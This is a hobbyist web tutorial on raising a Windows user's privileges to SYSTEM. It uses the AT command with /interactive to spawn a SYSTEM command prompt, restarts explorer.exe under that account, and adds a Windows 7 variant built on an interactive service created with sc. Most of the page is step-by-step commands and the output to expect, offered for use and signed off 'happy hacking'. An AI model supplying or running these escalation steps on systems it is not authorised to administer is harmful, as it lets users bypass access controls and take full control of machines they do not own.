Recent comments

You are here

Raising user privledges with the AT command

This project outlines one way that a user may be able to raise their privledges on a windows based system. The ability to use the at command is the security risk here. If a user can use the AT command then they can possibly raise their privledges depending on what privledges they already had.

Lets first look at how we can tell if the user has privleges to run the AT command If they cannot run the AT command they cannot raise their privledges in this way

>First log into the user account
>Now go to Start >> Run
>When the run window opens type in the following:

cmd

>This opens command prompt
now type in the follwing:

at

>If it gives the error message "permission is denied"
then the user cannot run the command however if the message is "There are no enties in the list" then the user could use this process to gain elevated privledges. If you dont understand what privledges are then do some research on it but it basically means they can do more administrative things than they were allowed to before they used this process.

**If you would like to learn more about the at command then in command prompt type the following

at /?

This will tell you more about it's use

Now that you know which accounts can and cannot perform this process lets take a look at how its done.
The AT command is used to schedule tasks on your computer just like task manager however from the command line we have more control than we do in windows GUI so now lets schedule a task.

>First log into the user account for which you want to perform this action.

>Go to Start >> Run

>type:

cmd

>This opens the command prompt again

>Ok now type in the following command

at 14:03 /interactive "cmd.exe"

***Replace 14:01 with the current time plus 1 minute this makes the process run one minute from now or if you want give yourself a couple minutes. Use military time if you dont understand that then google it or something cause that is not the topic here**

> If the time changed before you hit enter it will not run until tommorow so if you want to be safe run it two minutes after the current time

>It should give you a message
"added new job with job ID = (some #)"

>This tells us it worked now just wait until the time you entered

>At the time you entered a new command prompt window will open. LEAVE BOTH WINDOWS OPEN

>In the new window look at the top it should say
C:\Windows\System32\svchost.exe
>Now take a look at the other command prompt window which we opened before, it says
C:\Windows\System32\cmd.exe

>Now we see a difference but what is the difference
well the cmd.exe window is a normal command prompt the svchost window is a command prompt also but it is being run as the system not a user account!

>So what can we do with this? Well we already have raised privledges at this point but unless you are fimiliar with command prompt ( Which everyone should be in my opinion ) then you can't do much so to take care of that we do a little trick to close the windows GUI and re-open it go back to your svchost.exe window BUT DONT CLOSE THE OTHER ONE WE STILL NEED IT

>type in the following:

taskkill /f /im explorer.exe

>What his does is closes explorer.exe which is windows explorer or the GUI for windows

>Now type:

start %SystemRoot%\explorer.exe

>This will re-open explorer

>Since you are logging into windows as the user "System" and this is probably the first time you will be greeted with the windows tour and possibly some other messages

>Click on Start and look at the top of the menu where it says your name It now says "System" this confirms that you are logged in as the system it's self.

>Now you can do whaever you want from here just as you would normally but you will be able to adjust more settings now due to the fact that you are logged in as System.

Good deal but how do I get back?

Well to get back go to your open svchost window

now type:

taskkill /f /im explorer.exe

now go to the CMD.EXE window

type in, ( yup you guessed it )

start %SystemRoot%\explorer.exe

FOR WINDOWS 7

navigate to the C:\Windows\System32 folder

right click with your mouse and choose Run CMD as administrator and then type in the following command lines:

sc create testsvc binpath= "cmd /K start" type= own type= interact

sc start testsvc

You will get a popup window from "Interactive Services Detection". Click View the message. Then you will receive a cmd prompt running by SYSTEM.

now you are back to where you were have fun and happy hacking

Theme by Danetsoft and Danang Probo Sayekti inspired by Maksimer